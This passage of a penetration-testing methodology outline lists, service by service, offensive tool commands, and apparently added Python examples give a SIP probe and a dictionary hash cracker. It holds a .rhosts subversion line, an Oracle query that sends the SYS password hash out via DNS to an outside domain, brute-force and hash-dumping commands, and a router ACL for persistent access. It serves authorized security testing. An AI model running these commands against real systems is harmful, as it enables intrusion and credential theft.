4.15.3. Reference Material

4.15.3.1. PSK cracking paper

4.15.3.2. SecurityFocus Infocus

4.15.3.3. Scanning a VPN Implementation

4.16. Modbus port 502 open

4.16.1. modscan

4.17. rlogin port 513 open

4.17.1. Rlogin Enumeration

4.17.1.1. Find the files

4.17.1.1.1. find / -name .rhosts

4.17.1.1.2. locate .rhosts

4.17.1.2. Examine Files

4.17.1.2.1. cat .rhosts

4.17.1.3. Manual Login

4.17.1.3.1. rlogin hostname -l username

4.17.1.3.2. rlogin <IP>

4.17.1.4. Subvert the files

4.17.1.4.1. echo ++ > .rhosts

4.17.2. Rlogin Brute force

4.17.2.1. Hydra

4.18. rsh port 514 open

4.18.1. Rsh Enumeration

4.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

4.18.2. Rsh Brute Force

4.18.2.1. rsh-grind

4.18.2.2. Hydra

4.18.2.3. medusa

4.19. SQL Server ports 1433, 1434 open

4.19.1. SQL Enumeration

4.19.1.1. piggy

4.19.1.2. SQLPing

4.19.1.2.1. sqlping ip_address/hostname

4.19.1.3. SQLPing2

4.19.1.4. SQLPing3

4.19.1.5. SQLpoke

4.19.1.6. SQL Recon

4.19.1.7. SQLver

4.19.2. SQL Brute Force

4.19.2.1. SQLPAT

4.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

4.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

4.19.2.2. SQL Dict

4.19.2.3. SQLAT

4.19.2.4. Hydra

4.19.2.5. SQLlhf

4.19.2.6. ForceSQL

4.20. Citrix port 1494 open

4.20.1. Citrix Enumeration

4.20.1.1. Default Domain

4.20.1.2. Published Applications

4.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

4.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

4.20.2. Citrix Brute Force

4.20.2.1. bforce.js

4.20.2.2. connect.js

4.20.2.3. Citrix Brute-forcer

4.20.2.4. Reference Material

4.20.2.4.1. Hacking Citrix - the legitimate backdoor

4.20.2.4.2. Hacking Citrix - the forceful way

4.21. Oracle Port 1521 Open

4.21.1. Oracle Enumeration

4.21.1.1. oracsec

4.21.1.2. Repscan

4.21.1.3. Sidguess

4.21.1.4. Scuba

4.21.1.5. DNS/HTTP Enumeration

4.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;

4.21.1.6. WinSID

4.21.1.7. Oracle default password list

4.21.1.8. TNSVer

4.21.1.8.1. tnsver host [port]

4.21.1.9. TCP Scan

4.21.1.10. Oracle TNSLSNR

4.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

4.21.1.11. TNSCmd

4.21.1.11.1. perl tnscmd.pl -h ip_address

4.21.1.11.2. perl tnscmd.pl version -h ip_address

4.21.1.11.3. perl tnscmd.pl status -h ip_address

4.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

4.21.1.12. LSNrCheck

4.21.1.13. Oracle Security Check (needs credentials)

4.21.1.14. OAT

4.21.1.14.1. sh opwg.sh -s ip_address

4.21.1.14.2. opwg.bat -s ip_address

4.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID, or on Windows: c:\oquery -s ip_address -u username -p password -d SID

4.21.1.15. OScanner

4.21.1.15.1. sh oscanner.sh -s ip_address

4.21.1.15.2. oscanner.exe -s ip_address

4.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

4.21.1.15.4. reportviewer.exe oscanner_saved_file.xml

4.21.1.16. NGS Squirrel for Oracle

4.21.1.17. Service Register

4.21.1.17.1. Service-register.exe ip_address

4.21.1.18. PLSQL Scanner 2008

4.21.2. Oracle Brute Force

4.21.2.1. OAK

4.21.2.1.1. ora-getsid hostname port sid_dictionary_list

4.21.2.1.2. ora-auth-alter-session host port sid username password sql

4.21.2.1.3. ora-brutesid host port start

4.21.2.1.4. ora-pwdbrute host port sid username password-file

4.21.2.1.5. ora-userenum host port sid userlistfile

4.21.2.1.6. ora-ver -e (-f -l -a) host port

4.21.2.2. breakable (Targets Application Server Port)

4.21.2.2.1. breakable.exe host url [port] [v], where host = ip_address of the Oracle Portal Server; url = PATH_INFO, i.e. /pls/orasso; port = TCP port the Oracle Portal Server is serving pages from; v = verbose

4.21.2.3. SQLInjector (Targets Application Server Port)

4.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

4.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

4.21.2.4. Check Password

4.21.2.5. orabf

4.21.2.5.1. orabf [hash]:[username] [options]

4.21.2.6. thc-orakel

4.21.2.6.1. Cracker

4.21.2.6.2. Client

4.21.2.6.3. Crypto

4.21.2.7. DBVisualisor

4.21.2.7.1. SQL scripts from pentest.co.uk

4.21.2.7.2. Manual SQL input of previously reported vulnerabilities

4.21.3. Oracle Reference Material

4.21.3.1. Understanding SQL Injection

4.21.3.2. SQL Injection walkthrough

4.21.3.3. SQL Injection by example

4.21.3.4. Advanced SQL Injection in Oracle databases

4.21.3.5. Blind SQL Injection

4.21.3.6. SQL Cheatsheets

4.22. NFS Port 2049 open

4.22.1. NFS Enumeration

4.22.1.1. showmount -e hostname/ip_address

4.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

4.22.2. NFS Brute Force

4.22.2.1. Interact with NFS share and try to add/delete

4.22.2.2. Exploit and Confuse Unix

4.22.3. Examine Configuration Files

4.22.3.1. /etc/exports

4.22.3.2. /etc/lib/nfs/xtab

4.22.4. nmap nse script

4.22.4.1. nfs-showmount

4.23. Compaq/HP Insight Manager ports 2301, 2381 open

4.23.1. HP Enumeration

4.23.1.1. Authentication Method

4.23.1.1.1. Host OS Authentication

4.23.1.1.2. Default Authentication

4.23.1.2. Wikto

4.23.1.3. Nstealth

4.23.2. HP Bruteforce

4.23.2.1. Hydra

4.23.2.2. Acunetix

4.23.3. Examine Configuration Files

4.23.3.1. path.properties

4.23.3.2. mx.log

4.23.3.3. CLIClientConfig.cfg

4.23.3.4. database.props

4.23.3.5. pg_hba.conf

4.23.3.6. jboss-service.xml

4.23.3.7. .namazurc

4.24. MySQL port 3306 open

4.24.1. Enumeration

4.24.1.1. nmap -A -n -p3306 <IP Address>

4.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>

4.24.1.3. telnet IP_Address 3306

4.24.1.4. use test; select * from test;

4.24.1.5. To check for other DB's -- show databases

4.24.2. Administration

4.24.2.1. MySQL Network Scanner

4.24.2.2. MySQL GUI Tools

4.24.2.3. mysqlshow

4.24.2.4. mysqlbinlog

4.24.3. Manual Checks

4.24.3.1. Default usernames and passwords

4.24.3.1.1. username: root password: (blank)

4.24.3.1.2. testing

4.24.3.2. Configuration Files

4.24.3.2.1. Operating System

4.24.3.2.2. Command History

4.24.3.2.3. Log Files

4.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

4.24.3.2.5. MySQL data directory (Location specified in my.cnf)

4.24.3.2.6. SSL Check

4.24.3.3. Privilege Escalation

4.24.3.3.1. Current Level of access

4.24.3.3.2. Access passwords

4.24.3.3.3. Create a new user and grant it privileges

4.24.3.3.4. Break into a shell

4.24.4. SQL injection

4.24.4.1. mysql-miner.pl

4.24.4.1.1. mysql-miner.pl http://target/ expected_string database

4.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

4.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

4.24.5. References.

4.24.5.1. Design Weaknesses

4.24.5.1.1. MySQL running as root

4.24.5.1.2. Exposed publicly on Internet

4.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

4.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

4.25. RDesktop port 3389 open

4.25.1. Rdesktop Enumeration

4.25.1.1. Remote Desktop Connection

4.25.2. Rdesktop Bruteforce

4.25.2.1. TSGrinder

4.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

4.25.2.2. Tscrack

4.26. Sybase Port 5000+ open

4.26.1. Sybase Enumeration

4.26.1.1. sybase-version ip_address from NGS

4.26.2. Sybase Vulnerability Assessment

4.26.2.1. Use DBVisualiser

4.26.2.1.1. Sybase Security checksheet

4.26.2.1.2. Manual sql input of previously reported vulnerabilities

4.26.2.2. NGS Squirrel for Sybase

4.27. SIP Port 5060 open

4.27.1. SIP Enumeration

4.27.1.1. netcat

4.27.1.1.1. nc IP_Address Port

4.27.1.2. sipflanker

4.27.1.2.1. python sipflanker.py 192.168.1-254

4.27.1.3. Sipscan

4.27.1.4. smap

4.27.1.4.1. smap IP_Address/Subnet_Mask

4.27.1.4.2. smap -o IP_Address/Subnet_Mask

4.27.1.4.3. smap -l IP_Address

4.27.2. SIP Packet Crafting etc.

4.27.2.1. sipsak

4.27.2.1.1. Tracing paths: - sipsak -T -s sip:[email protected]

4.27.2.1.2. Options request:- sipsak -vv -s sip:[email protected]

4.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]

4.27.2.2. siprogue

4.27.3. SIP Vulnerability Scanning/ Brute Force

4.27.3.1. tftp bruteforcer

4.27.3.1.1. Default dictionary file

4.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

4.27.3.2. VoIPaudit

4.27.3.3. SiVuS

4.27.4. Examine Configuration Files

4.27.4.1. SIPDefault.cnf

4.27.4.2. asterisk.conf

4.27.4.3. sip.conf

4.27.4.4. phone.conf

4.27.4.5. sip_notify.conf

4.27.4.6. <Ethernet address>.cfg

4.27.4.7. 000000000000.cfg

4.27.4.8. phone1.cfg

4.27.4.9. sip.cfg etc. etc.
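The sipsak OPTIONS request in 4.27.2.1 is the cheapest SIP fingerprint: the reply's Server/User-Agent header names the PBX, Allow lists the methods it will accept, and a 401/407 hands you the authentication realm that later registration attacks need. The following is an added example, not code from the framework page: it builds that OPTIONS request and parses the two kinds of reply. The scanner address 192.0.2.10 and both sample replies are constructed.

```python
"""SIP OPTIONS probe: build the request sipsak -vv -s sends and parse the reply.

Added example for 4.27.1/4.27.2; not from the framework page.  The local
address and the sample replies are constructed.
"""
import re
import socket

LOCAL = "192.0.2.10"   # hypothetical scanner address used in Via/From/Contact


def build_options(target, port=5060, branch="z9hG4bK-probe1", call_id="probe1@scanner"):
    """Return the OPTIONS request text; a Via branch starting z9hG4bK is mandatory in RFC 3261."""
    lines = [
        f"OPTIONS sip:{target}:{port} SIP/2.0",
        f"Via: SIP/2.0/UDP {LOCAL}:5060;branch={branch};rport",
        f"From: <sip:sipsak@{LOCAL}>;tag=probe",
        f"To: <sip:{target}:{port}>",
        f"Call-ID: {call_id}",
        "CSeq: 1 OPTIONS",
        f"Contact: <sip:sipsak@{LOCAL}:5060>",
        "Max-Forwards: 70",
        "Accept: application/sdp",
        "Content-Length: 0",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_response(raw):
    """Pull out what fingerprinting needs: status, Server/User-Agent, Allow, and the auth realm."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = re.match(r"SIP/2\.0 (\d{3}) (.*)", lines[0])
    if not m:
        raise ValueError("not a SIP response: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())

    def first(*names):
        for n in names:
            if n in headers:
                return headers[n][0]
        return None

    allow = [x.strip() for v in headers.get("allow", []) for x in v.split(",")]
    realm = None
    auth = first("www-authenticate", "proxy-authenticate")
    if auth:
        r = re.search(r'realm="([^"]*)"', auth)
        realm = r.group(1) if r else None
    return {"status": int(m.group(1)), "reason": m.group(2),
            "server": first("server", "user-agent"), "allow": allow, "realm": realm}


def probe(target, port=5060, timeout=3):
    """Send one OPTIONS over UDP and parse the first reply (live use only)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_options(target, port).encode(), (target, port))
        data, _ = s.recvfrom(65535)
    return parse_response(data.decode(errors="replace"))


# Constructed replies: an answering PBX and a proxy that demands authentication.
SAMPLE_200 = ("SIP/2.0 200 OK\r\n"
              "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-probe1;received=192.0.2.10;rport=5060\r\n"
              "From: <sip:sipsak@192.0.2.10>;tag=probe\r\n"
              "To: <sip:203.0.113.5:5060>;tag=as1a2b3c4d\r\n"
              "Call-ID: probe1@scanner\r\n"
              "CSeq: 1 OPTIONS\r\n"
              "Server: Asterisk PBX 1.6.2.11\r\n"
              "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO\r\n"
              "Supported: replaces, timer\r\n"
              "Content-Length: 0\r\n\r\n")
SAMPLE_401 = ("SIP/2.0 401 Unauthorized\r\n"
              "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-probe1\r\n"
              "To: <sip:203.0.113.5:5060>;tag=xyz\r\n"
              "CSeq: 1 OPTIONS\r\n"
              'WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="1a2b3c"\r\n'
              "Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    print(build_options("203.0.113.5"))
    print(parse_response(SAMPLE_200))
    print(parse_response(SAMPLE_401))
```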

4.28. VNC port 5900^ open

4.28.1. VNC Enumeration

4.28.1.1. Scans

4.28.1.1.1. 5900 upwards (5900 + display number) for direct access; 5800 upwards for the HTTP/Java viewer.

4.28.2. VNC Brute Force

4.28.2.1. Password Attacks

4.28.2.1.1. Remote

4.28.2.1.2. Local

4.28.3. Examine Configuration Files

4.28.3.1. .vnc

4.28.3.2. /etc/vnc/config

4.28.3.3. $HOME/.vnc/config

4.28.3.4. /etc/sysconfig/vncservers

4.28.3.5. /etc/vnc.conf

4.29. X11 port 6000^ open

4.29.1. X11 Enumeration

4.29.1.1. List open windows

4.29.1.2. Authentication Method

4.29.1.2.1. Xauth

4.29.1.2.2. Xhost

4.29.2. X11 Exploitation

4.29.2.1. xwd

4.29.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

4.29.2.2. Keystrokes

4.29.2.2.1. Received

4.29.2.2.2. Transmitted

4.29.2.3. Screenshots

4.29.2.4. xhost +

4.29.3. Examine Configuration Files

4.29.3.1. /etc/Xn.hosts

4.29.3.2. /usr/lib/X11/xdm

4.29.3.2.1. Untitled

4.29.3.3. /usr/lib/X11/xdm/xsession

4.29.3.4. /usr/lib/X11/xdm/xsession-remote

4.29.3.5. /usr/lib/X11/xdm/xsession.0

4.29.3.6. /usr/lib/X11/xdm/xdm-config

4.29.3.6.1. DisplayManager*authorize:on

4.30. Tor Port 9001, 9030 open

4.30.1. Tor Node Checker

4.30.1.1. Ip Pages

4.30.1.2. Kewlio.net

4.30.2. nmap NSE script

4.31. Jet Direct 9100 open

4.31.1. hijetta

5. Password cracking

5.1. Rainbow crack

5.1.1. ophcrack

5.1.2. rainbow tables

5.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

5.2. Ophcrack

5.3. Cain & Abel

5.4. John the Ripper

5.4.1. ./unshadow passwd shadow > file_to_crack

5.4.2. ./john -single file_to_crack

5.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

5.4.4. ./john -show file_to_crack

5.4.5. ./john --incremental:All file_to_crack

5.5. fgdump

5.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

5.6. pwdump6

5.6.1. pwdump [-h][-o][-u][-p] machineName

5.7. medusa

5.8. LCP

5.9. L0phtcrack (Note: this tool was acquired by Symantec from @stake and it is their policy not to ship it outside the USA and Canada)

5.9.1. Domain credentials

5.9.2. Sniffing

5.9.3. pwdump import

5.9.4. sam import

5.10. aiocracker

5.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
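The John the Ripper lines above (unshadow, then -single, -w with -rules, -show) and the aiocracker command are the two halves of the same job: get the hashes into a crackable shape, identify the algorithm, then throw a word list with rules at them. The following is an added example, not code from the framework page, that does all three on constructed data: it merges passwd/shadow the way unshadow does, names the hash type from the modular-crypt prefix or the raw hex length, and runs an aiocracker-style rule-based dictionary attack on raw md5/sha digests. The crypt-style hashes in the sample shadow are placeholders and are never verified here.

```python
"""unshadow, hash-type identification and a rule-based dictionary attack.

Added example for section 5 (John the Ripper / aiocracker); not from the
framework page.  The passwd/shadow lines and word list are constructed, and
the crypt-style hashes are placeholders that are never verified here.
"""
import hashlib

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
"""
SHADOW = """\
root:$6$Q1Z6m9xU$placeholderhashbody:18000:0:99999:7:::
alice:$1$saltsalt$placeholderhashbody:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
"""


def unshadow(passwd, shadow):
    """Merge like john's unshadow: put each shadow hash into the passwd password field."""
    hashes = {l.split(":")[0]: l.split(":")[1] for l in shadow.splitlines() if l}
    out = []
    for l in passwd.splitlines():
        f = l.split(":")
        f[1] = hashes.get(f[0], f[1])
        out.append(":".join(f))
    return out


def identify_hash(h):
    """Name the algorithm from the modular-crypt prefix or, for raw digests, from the hex length."""
    prefixes = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
    for p, name in prefixes.items():
        if h.startswith(p):
            return name
    if h in ("*", "!", "!!", "") or h.startswith("!"):
        return "locked"
    if all(c in "0123456789abcdefABCDEF" for c in h):
        return {32: "md5", 40: "sha1", 64: "sha256", 96: "sha384", 128: "sha512"}.get(len(h), "unknown")
    return "unknown"


def hexdigest(algo, text):
    """Hex digest of a string, for building targets and checking guesses."""
    return hashlib.new(algo, text.encode()).hexdigest()


def candidates(word):
    """Cheap john-style rules: case variants with numeric and year suffixes."""
    suffixes = [""] + [str(n) for n in range(100)] + [str(y) for y in range(1990, 2016)]
    for base in (word, word.lower(), word.capitalize(), word.upper()):
        for s in suffixes:
            yield base + s


def dictionary_attack(target_hex, algo, wordlist):
    """Return the plaintext whose digest matches, or None (aiocracker-style raw-hash attack)."""
    target = target_hex.lower()
    for word in wordlist:
        for cand in candidates(word):
            if hexdigest(algo, cand) == target:
                return cand
    return None


if __name__ == "__main__":
    for line in unshadow(PASSWD, SHADOW):
        print(line, "->", identify_hash(line.split(":")[1]))
    print(dictionary_attack(hexdigest("md5", "Summer2009"), "md5", ["summer", "winter"]))
```

Raw unsalted digests are the only ones hashlib can attack directly; the crypt-style $1$/$5$/$6$ hashes from a real shadow file go to john or the rainbow-table tools above.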

6. Vulnerability Assessment - Utilising vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results are then analysed to determine whether any vulnerabilities could be exploited to gain access to a target host on the network. A number of tests carried out by these scanners are just banner grabbing/obtaining version information; once these details are known, the version is compared against the Common Vulnerabilities and Exposures (CVE) entries that have been released, and any matches are reported to the user. Other tools actually use manual pen testing methods and display the output received, i.e. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.

6.1. Manual

6.1.1. Patch Levels

6.1.2. Confirmed Vulnerabilities

6.1.2.1. Severe

6.1.2.2. High

6.1.2.3. Medium

6.1.2.4. Low

6.2. Automated

6.2.1. Reports

6.2.2. Vulnerabilities

6.2.2.1. Severe

6.2.2.2. High

6.2.2.3. Medium

6.2.2.4. Low

6.3. Tools

6.3.1. GFI

6.3.2. Nessus (Linux)

6.3.2.1. Nessus (Windows)

6.3.3. NGS Typhon

6.3.4. NGS Squirrel for Oracle

6.3.5. NGS Squirrel for SQL

6.3.6. SARA

6.3.7. MatriXay

6.3.8. BiDiBlah

6.3.9. SSA

6.3.10. Oval Interpreter

6.3.11. Xscan

6.3.12. Security Manager +

6.3.13. Inguma

6.4. Resources

6.4.1. Security Focus

6.4.2. Microsoft Security Bulletin

6.4.3. Common Vulnerabilities and Exposures (CVE)

6.4.4. National Vulnerability Database (NVD)

6.4.5. The Open Source Vulnerability Database (OSVDB)

6.4.5.1. Standalone Database

6.4.5.1.1. Update URL

6.4.6. United States Computer Emergency Response Team (US-CERT)

6.4.7. Computer Emergency Response Team

6.4.8. Mozilla Security Information

6.4.9. SANS

6.4.10. Securiteam

6.4.11. PacketStorm Security

6.4.12. Security Tracker

6.4.13. Secunia

6.4.14. Vulnerabilities.org

6.4.15. ntbugtraq

6.4.16. Wireless Vulnerabilities and Exploits (WVE)

6.5. Blogs

6.5.1. Carnal0wnage

6.5.2. Fsecure Blog

6.5.3. g0ne blog

6.5.4. GNUCitizen

6.5.5. ha.ckers Blog

6.5.6. Jeremiah Grossman Blog

6.5.7. Metasploit

6.5.8. nCircle Blogs

6.5.9. pentest mokney.net

6.5.10. Rational Security

6.5.11. Rise Security

6.5.12. Security Fix Blog

6.5.13. Software Vulnerability Exploitation Blog

6.5.14. Taosecurity Blog

7. AS/400 Auditing

7.1. Remote

7.1.1. Information Gathering

7.1.1.1. Nmap using common iSeries (AS/400) services.

7.1.1.1.1. Unsecured services (Port;name;description)

7.1.1.1.2. Secured services (Port;name;description)

7.1.1.2. NetCat (old school technique)

7.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"

7.1.1.3. Banners Grabbing

7.1.1.3.1. Telnet

7.1.1.3.2. FTP

7.1.1.3.3. HTTP Banner

7.1.1.3.4. POP3

7.1.1.3.5. SNMP

7.1.1.3.6. SMTP

7.1.2. Users Enumeration

7.1.2.1. Default AS/400 users accounts

7.1.2.2. Error messages

7.1.2.2.1. Telnet Login errors

7.1.2.2.2. POP3 authentication Errors

7.1.2.3. Qsys symbolic link (if ftp is enabled)

7.1.2.3.1. ftp target | quote stat | quote site namefmt 1

7.1.2.3.2. cd /

7.1.2.3.3. quote site listfmt 1

7.1.2.3.4. mkdir temp

7.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

7.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

7.1.2.3.7. dir /temp/qsys/*.usrprf

7.1.2.4. LDAP

7.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

7.1.2.4.2. Tool to browse LDAP

7.1.3. Exploitation

7.1.3.1. CVE References

7.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

7.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

7.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

7.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

7.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

7.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

7.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

7.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

7.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

7.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

7.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

7.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

7.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

7.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

7.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

7.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

7.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

7.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

7.1.3.2. Access with Work Station Gateway

7.1.3.2.1. http://target:5061/WSG

7.1.3.2.2. Default AS/400 accounts.

7.1.3.3. Network attacks (next release)

7.1.3.3.1. DB2

7.1.3.3.2. QSHELL

7.1.3.3.3. Hijacking Terminals

7.1.3.3.4. Trojan attacks

7.1.3.3.5. Hacking from AS/400

7.2. Local

7.2.1. System Value Security

7.2.1.1. Untitled

7.2.1.1.1. Untitled

7.2.1.2. Untitled

7.2.1.2.1. Untitled

7.2.1.3. Untitled

7.2.1.3.1. Untitled

7.2.1.4. Untitled

7.2.1.4.1. Recommended value is 30

7.2.2. Password Policy

7.2.2.1. Untitled

7.2.2.1.1. Untitled

7.2.2.2. Untitled

7.2.2.2.1. Untitled

7.2.2.3. Untitled

7.2.2.3.1. Untitled

7.2.2.4. Untitled

7.2.2.4.1. Untitled

7.2.2.5. Untitled

7.2.3. Audit level

7.2.3.1. Untitled

7.2.3.1.1. Recommended value is *SECURITY

7.2.4. Documentation

7.2.4.1. Users class

7.2.4.1.1. Untitled

7.2.4.2. System Audit Settings

7.2.4.2.1. Untitled

7.2.4.3. Special Authorities Definitions

7.2.4.3.1. Untitled

8. Bluetooth Specific Testing

8.1. Bluescanner

8.2. Bluesweep

8.3. btscanner

8.4. Redfang

8.5. Blueprint

8.6. Bluesnarfer

8.7. Bluebugger

8.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

8.8. Blueserial

8.9. Bloover

8.10. Bluesniff

8.11. Exploit Frameworks

8.11.1. BlueMaho

8.11.1.1. Untitled

8.12. Resources

8.12.1. URL's

8.12.1.1. BlueStumbler.org

8.12.1.2. Bluejackq.com

8.12.1.3. Bluejacking.com

8.12.1.4. Bluejackers

8.12.1.5. bluetooth-pentest

8.12.1.6. ibluejackedyou.com

8.12.1.7. Trifinite

8.12.2. Vulnerability Information

8.12.2.1. Common Vulnerabilities and Exposures (CVE)

8.12.2.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

8.12.3. White Papers

8.12.3.1. Bluesnarfing

9. Cisco Specific Testing

9.1. Methodology

9.1.1. Scan & Fingerprint.

9.1.1.1. Untitled

9.1.1.2. Untitled

9.1.1.3. If SNMP is active, then community string guessing should be performed.

9.1.2. Credentials Guessing.

9.1.2.1. Untitled

9.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

9.1.3. Connect

9.1.3.1. Untitled

9.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

9.1.4. Check for bugs

9.1.4.1. Untitled

9.1.4.1.1. The most widely known/used are: Nessus, Retina, GFI LanGuard and Core Impact.

9.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

9.1.5. Further your attack

9.1.5.1. Untitled

9.1.5.1.1. running-config is the currently running configuration. This gets loaded from the startup-config on boot. This configuration is editable and the changes are immediate, but any changes will be lost once the router is rebooted. It is this configuration that requires altering to maintain a non-permanent connection through to the internal network.

9.1.5.1.2. startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.

9.1.5.2. Untitled

9.1.5.2.1. #> access-list 100 permit ip <IP> any

9.2. Scan & Fingerprint.

9.2.1. Port Scanning

9.2.1.1. nmap

9.2.1.1.1. Untitled

9.2.1.2. Other tools

9.2.1.2.1. Untitled

9.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

9.2.2. Fingerprinting

9.2.2.1. Untitled

9.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

9.2.2.2. Untitled

9.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

9.2.2.2.2. Untitled

9.3. Password Guessing.

9.3.1. Untitled

9.3.1.1. ./CAT  -h  <IP>  -a  password.wordlist

9.3.1.2. Untitled

9.3.2. Untitled

9.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

9.3.2.2. Untitled

9.3.3. Untitled

9.3.3.1. BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco

9.3.3.2. Untitled

9.4. SNMP Attacks.

9.4.1. Untitled

9.4.1.1. ./CAT  -h  <IP>  -w  SNMP.wordlist

9.4.1.2. Untitled

9.4.2. Untitled

9.4.2.1. onesixtyone -c SNMP.wordlist <IP>

9.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
Scanning 1 hosts, 64 communities
10.1.1.175 [enable] Cisco Internetwork Operating System Software
IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2005 by cisco Systems, Inc.
Compiled Fri 12-Aug
10.1.1.175 [Cisco] Cisco Internetwork Operating System Software
IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2005 by cisco Systems, Inc.
Compiled Fri 12-Aug

9.4.3. Untitled

9.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>

9.4.3.2. Untitled

9.5. Connecting.

9.5.1. Telnet

9.5.1.1. Untitled

